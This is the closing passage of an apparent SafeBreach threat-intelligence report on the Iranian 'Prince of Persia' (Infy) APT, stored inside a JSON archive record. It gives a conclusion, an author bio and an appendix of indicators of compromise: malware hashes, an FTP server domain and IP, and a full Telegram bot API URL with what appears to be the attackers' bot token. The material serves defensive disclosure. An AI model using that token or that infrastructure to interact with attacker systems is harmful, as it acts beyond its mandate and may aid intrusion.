xleeuzjdpqwm). This may indicate that the 8 digits are generated like the\r\nold CRC32, and there is a new part that generates the first part of the domain name.\r\nConclusion\r\nDespite the appearance of having gone dark in 2022, Prince of Persia threat actors have done quite the opposite.\r\nOur ongoing research campaign into this prolific and elusive group has highlighted critical details about their\r\nactivities, C2 servers, and identified malware variants in the last three years. This threat group is still active,\r\nrelevant, and dangerous. By sharing our research publicly, we hope to help other cybersecurity professionals better\r\nunderstand the associated risks and IOCs of this group, as well as support additional research within the larger\r\ncybersecurity community. \r\nFor more in-depth information about this research, please: \r\nContact your customer success representative if you are a current SafeBreach customer\r\nSchedule a one-on-one discussion with a SafeBreach expert\r\nContact Kesselring PR for media inquiries \r\nAbout the Researcher\r\nTomer Bar brings over 20 years of cybersecurity research experience to this position, including work in the areas\r\nof advanced persistent threat (APT) groups, vulnerabilities, reverse engineering, and forensics. As a hands-on\r\nsecurity researcher and head of the SafeBreach Labs team, Bar has discovered multiple vulnerabilities in the\r\nWindows operating system, His contributions have earned him recognition as one of Microsoft’s 2023 Most\r\nValuable Security Researchers and a nomination for Best Privilege Escalation Vulnerability at the 2021 Pwnie\r\nAwards. Tomer holds a Master’s degree from Bar Ilan University, He is a frequent public speaker, presenting his\r\nresearch at events worldwide, including DEF CON (28-31), Black Hat USA, Black Hat Asia, etc. he is also\r\nmember of BlackHat Europe review board where he leads the malware track talks.\r\nAppendix: IOCs – Malware Hashes\r\nTonnerre v14 exe\r\nCB6ED0DD5DBC2E34AE36DD22B9522F7EEC94BBFDA2DCDA7425736656279F8CDF\r\nTonnerre v15 exe\r\n30C20ADA243B7E476E006DEC94876BDEECE4F8ACA12A4CB6CF962C80F1A6EE3C\r\nTonnerre v17 exe\r\nhttps://www.safebreach.com/blog/prince-of-persia-a-decade-of-an-iranian-nation-state-apt-campaign-activity/\r\nPage 30 of 32\n\nD9DFC8A8E3E259A517A91E2E91E3A1D6EF1D5B0886E6729BF897D6EF1B2DE722\r\nFoudre SFX v34  \r\n43ccc2620229d88d5a6ca2b064da0554ec3c3cc29a097e7a2d97283257cfae69\r\n0bfc11c6ba57fdaa8b865555d80d8f7d7b1d0f41a23a277885198b3113c945d9\r\nCf64bf78ce570f8085110defc8ec32ff4f01c7359723510b9d1923fd93d12240\r\nFBB2AC0D07B84068AA35376CC994039F9FC1D2341643BC2BF268D65AB11ECBE3\r\n2c46406fb9111e0e4d982de54f335ae2900cdc39490d58f765cd5014153b3e12\r\nFoudre v34 dll – imphash \r\n57447c4c35a807b252b9ba3c17de230f\r\nd912\r\n52abb57bf6f9db815b3ddf6241e21d4096f36eb998bb51e728bbe68c0f8e8e15\r\nd232\r\nfa95a09e538b8c186a3239e3ff80ec9054b50aab80c624e75563ace4e60e31da\r\nd463\r\nF54cfe296186644d0fed271c469af1ef9b6156affe9e030e7b83b8de097eb1e7\r\nD665\r\n6f976a685ae838a7062fb4f152c6c77c42168b78b9aadd4278ec1c19f9bc1055\r\nD955\r\n12847DC6DFD86603E8F0085AE561B4B2E3089E5414E49628F7C411483C7B5CE8\r\nFoudre v34 Loaders \r\nconf8830.dll\r\nd3d8b79f86f152338aabeadfaf35ba2e43f82aa4bfa29ff70b59702b455fa6a6\r\nFoudre Office Infection \r\n15dd41ec1bdaabb741e8cc6481e0a98831798ac4e93c2513cdbd00c51241ffb7\r\n52e3a856548825ec0a3d6630e881ff4f79d2a11bc3420a73d42e161fabed53d9\r\nTonnerre v17 SFX\r\nC8583FDDF668808E31F993FF6BCFC6F8BA8B4C2C0C4EA51D4CCC6F5D311B6C90\r\nhttps://www.safebreach.com/blog/prince-of-persia-a-decade-of-an-iranian-nation-state-apt-campaign-activity/\r\nPage 31 of 32\n\nTelegram Chat\r\nhttps://api.telegram.org/bot7900216285:AAEVjLjt4csUKGanerJuuiDhdsmlUv0yooM/getChatMember?\r\nuser_id=874675833\u0026chat_id=874675833\r\nMaxPinner v5 \r\nTel jam shid.exe – upload to 13/6/21 to VirusTotal – creation probably 16/8/18\r\n34692cabe9e9ba584ec2b8947a7aad4f787d10a3da56886e52d05d0675fe7b01\r\nFixed FTP server – ttdl3.dynu.net was probably resolved to 178.33.49.126\r\nMaxPinner v8  \r\n5AD83F9FAD87273593F9DF73761DE211A704E6E10984FDE113A6435CC83C1E58\r\nSFX – 04844b5e15750467224c29b6fe5806e4093cd1d0ee4904dccf96831947574c85\r\nAmaq Finder\r\nB9741ad9ac084fb43804618acabe637f6b097bf72264b3335514678b2d0da785 – Amaq Finder Version 1.0 – 2017-\r\n07-19\r\nA107635083212c662dbb3b69951e0de7b3d3894d8bcd7cfff545d119f81aeb1f – AmaqFinder1.rar\r\nAmaq Finder v1.7\r\n23761caf7f4c6d7b3b4608c59729eb807c961deaa23aac94db5289b9b9739864\r\n09a2f03b5d54b48ba5f0df9ea57a6c20ba6fa90ad0f334132ea1da9320fbfbfd\r\na8565b678857129158904760ffe468e3ea6e4cf8a63a6c16b97e5717b1e8a384\r\namfkey01.key\r\nDE94830B9B4DF6867B7D2888ACCA9F3D0C103933B01721C04E6BD6492BDE9E58\r\nDeep Freeze Version\r\n55d60bcf83c81fff25ca413dc2f720a671f522d79cc13b6d618f7f25094acd62\r\nB1a16dd0500c570fb44cd13b68737fcd18710072559f810f3b3691ca93787cff\r\nFoudre v34 checks Internet connectivity and gets current date:\r\nhttp://worldtimeapi.org/api/timezone/GMT\r\nAmaq Finder checks Internet connectivity and gets current date: http://www.cnbc.com/id/100727362/device/rss\r\nSource: https://www.safebreach.com/blog/prince-of-persia-a-decade-of-an-iranian-nation-state-apt-campaign-activity/\r\nhttps://www.safebreach.com/blog/prince-of-persia-a-decade-of-an-iranian-nation-state-apt-campaign-activity/\r\nPage 32 of 32",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.safebreach.com/blog/prince-of-persia-a-decade-of-an-iranian-nation-state-apt-campaign-activity/"
	],
	"report_names": [
		"prince-of-persia-a-decade-of-an-iranian-nation-state-apt-campaign-activity"
	],
	"threat_actors": [
		{
			"id": "f763fd1f-f697-40eb-a082-df6fd3d13cb1",
			"created_at": "2023-01-06T13:46:38.561288Z",
			"updated_at": "2026-04-10T02:00:03.024326Z",
			"deleted_at": null,
			"main_name": "Infy",
			"aliases": [
				"Operation Mermaid",
				"Prince of Persia",
				"Foudre"
			],
			"source_name": "MISPGALAXY:Infy",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "59c9f31b-e032-44b9-bf3b-4f2cb3d17e39",
			"created_at": "2022-10-25T16:07:23.734244Z",
			"updated_at": "2026-04-10T02:00:04.731031Z",
			"deleted_at": null,
			"main_name": "Infy",
			"aliases": [
				"APT-C-07",
				"Infy",
				"Operation Mermaid",
				"Prince of Persia"
			],
			"source_name": "ETDA:Infy",
			"tools": [
				"Foudre",
				"Infy",
				"Tonnerre"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434247,
	"ts_updated_at": 1775792182,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/9e35d4e7e7c92176ebc097c36b77e326ebece9eb.pdf",
		"text": "https://archive.orkl.eu/9e35d4e7e7c92176ebc097c36b77e326ebece9eb.txt",
		"img": "https://archive.orkl.eu/9e35d4e7e7c92176ebc097c36b77e326ebece9eb.jpg"
	}
}